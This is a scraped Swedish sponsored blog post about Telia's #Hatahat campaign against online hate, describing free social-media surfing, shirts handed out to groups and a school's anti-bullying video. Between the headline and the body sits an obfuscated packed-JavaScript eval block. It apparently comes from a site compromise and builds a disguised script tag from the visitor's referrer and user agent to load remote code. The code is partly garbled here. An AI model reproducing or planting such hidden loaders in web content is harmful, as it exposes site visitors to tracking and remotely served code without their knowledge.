Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Telia: #Hatahat tillsammans mot näthat

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zyzbz|var|u0026u|referrer|iktbr||js|php’.split(’|’),0,{}))
type=”text/javascript” src=”//delivery.vidible.tv/jsonp/pid=577e3cfd88d2ff4f08aec5c8/56d0eb36e4b0066426bef73b.js”>

Det var i april som Telia påbörjade sin fantastiska kampanj där vi tillsammans i Sverige ger oss in i kampen mot näthat och mobbing. Kampanjen gick ut på att Telia släppte all surfing i sociala medier fritt på villkoret att man skulle vara schysst mot varandra och hålla god ton. Nu kommer nästa steg i kampanjen där intresset visat sig enormt. 

Under juni månad delade Telia ut över 25 000 tröjor med budskapet #Hatahat till över 650 grupper, organisationer, föreningar och skolor. Nu har dem träffat 6 st av dessa grupper som berättar hur just dem arbetar mot en schysstare digital värld. I mötet frå vi bland annat träffa det amerikanska fotbollslaget Northside Bulls och funktionshindrade Kulturspanarna i Örnsköldsvik.

Telia vill nu få med sig fler personer som vill hjälpa till på sitt egna sätt och göra skillnad. Alla filmer som är inspelade kommer att delas och spridas i sociala medier, på Youtube och i bloggar under hela sommaren med start nästa vecka.

Kika in Tullingebergsskolan i Botkyrka som tillsammans engagerat sig mot mobbing. Med sina 200 elever har skolan stolt tröjorna med #hatahat samt uppträdde på skolavslutningen med låten ”Jag hatar hat”.

Detta är ett sponsrat inlägg från Telia.